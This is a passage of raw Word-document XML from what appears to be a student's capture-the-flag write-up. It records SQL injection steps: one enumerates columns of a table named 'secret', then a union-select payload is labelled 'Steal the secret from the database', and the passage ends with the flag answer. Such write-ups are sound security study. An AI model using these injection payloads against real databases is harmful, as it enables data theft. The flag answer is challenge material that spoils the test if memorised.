        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A3889">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>= 'secret' #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400E32D4" w14:textId="6FE4F716" w:rsidR="004A3889" w:rsidRPr="004A3889" w:rsidRDefault="004A3889" w:rsidP="00CA3763">
      <w:r w:rsidRPr="004A3889">
        <w:t>Getting the columns from secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E385215" w14:textId="3DE7F1EA" w:rsidR="0010459E" w:rsidRDefault="0010459E" w:rsidP="00CA3763">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23AFB137" wp14:editId="185D9AAC">
            <wp:extent cx="3479800" cy="1536700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="图片 9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表格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FA5" w14:textId="5A037627" w:rsidR="004A3889" w:rsidRDefault="004A3889" w:rsidP="00CA3763"/>
    <w:p w14:paraId="51D89374" w14:textId="76CBECF9" w:rsidR="004A3889" w:rsidRDefault="004A3889" w:rsidP="00CA3763">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>tep04:</w:t>
      </w:r>
      <w:r w:rsidR="003D5A57">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D5A57" w:rsidRPr="003D5A57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5' union select id, secret,1,2,3 from secret #</w:t>
      </w:r>
      <w:r w:rsidR="003D5A57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D5A57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003D5A57" w:rsidRPr="003D5A57">
        <w:t>Steal the secret from the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68040127" w14:textId="31B0C5D2" w:rsidR="0010459E" w:rsidRDefault="0010459E" w:rsidP="00CA3763">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="711D3BB2" wp14:editId="325D3BCF">
            <wp:extent cx="5274310" cy="1054735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="图片 1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, 应用程序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CFDF" w14:textId="0BB07BE6" w:rsidR="003D5A57" w:rsidRDefault="003D5A57" w:rsidP="00CA3763"/>
    <w:p w14:paraId="0C8DF0E3" w14:textId="5B0A9569" w:rsidR="003D5A57" w:rsidRDefault="003D5A57" w:rsidP="00CA3763">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D5A57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer: csf2022_{armory-chatter-conceal}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4012B8C8" w14:textId="2947B01E" w:rsidR="00ED3EDD" w:rsidRDefault="00ED3EDD" w:rsidP="00CA3763">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E3C321C" w14:textId="265B3364" w:rsidR="00ED3EDD" w:rsidRDefault="00ED3EDD" w:rsidP="00CA3763">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CF474B" w14:textId="11EEB20F" w:rsidR="00ED3EDD" w:rsidRDefault="00ED3EDD" w:rsidP="00CA3763">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E71E47E" w14:textId="760E548B" w:rsidR="00ED3EDD" w:rsidRPr="003D5A57" w:rsidRDefault="00ED3EDD" w:rsidP="00C2413D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00ED3EDD" w:rsidRPr="003D5A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thu">
    <w:panose1 w:val="00000400000000000000"/>
    <w:charset w:val="DE"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="01000001" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0001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B1"/>
    <w:rsid w:val="00044DB1"/>
    <w:rsid w:val="00046EA7"/>
    <w:rsid w:val="00067B38"/>
    <w:rsid w:val="0010459E"/>
    <w:rsid w:val="00154BB8"/>
    <w:rsid w:val="0030387E"/>
    <w:rsid w:val="003D5A57"/>
    <w:rsid w:val="00444E5D"/>
    <w:rsid w:val="004A3889"/>
    <w:rsid w:val="00522F10"/>
    <w:rsid w:val="00573C6F"/>
    <w:rsid w:val="00583EC2"/>
    <w:rsid w:val="006715FF"/>
    <w:rsid w:val="007435E2"/>
    <w:rsid w:val="00792B10"/>
    <w:rsid w:val="0082760D"/>
    <w:rsid w:val="00AE328F"/>
    <w:rsid w:val="00BE0B76"/>
    <w:rsid w:val="00C2413D"/>
    <w:rsid w:val="00C50F0A"/>
    <w:rsid w:val="00C82361"/>
    <w:rsid w:val="00CA3763"/>
    <w:rsid w:val="00D34C6F"/>
    <w:rsid w:val="00DE1B2C"/>
    <w:rsid w:val="00EA4168"/>
    <w:rsid w:val="00ED3EDD"/>
    <w:rsid w:val="00EF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9B289"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8F183694-B073-3A4D-9AB6-487FA886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4DB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44DB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EA4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Li (Student)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Zan Li (Student)</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-22T04:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-03T06:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>